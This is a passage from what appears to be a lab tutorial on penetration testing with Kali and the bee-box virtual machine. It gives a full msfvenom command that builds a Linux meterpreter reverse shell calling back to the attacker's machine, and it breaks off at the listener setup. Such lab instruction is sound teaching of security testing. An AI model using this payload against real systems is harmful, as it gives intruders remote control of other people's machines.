For this exercise, have both the Kali and bee-box virtual machines running, then follow the next steps:
- First, we use msfvenom to generate our reverse meterpreter shell, setting it up to connect back to the Kali machine's IP address. Open a Terminal in Kali and issue the following command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4443 -f elf > cute_dolphin.bin
This will create a file named cute_dolphin.bin, which is a reverse Linux meterpreter shell; reverse means that it will connect back to the attacking machine instead of listening for us to connect.
- Next, we need to set up a listener for ...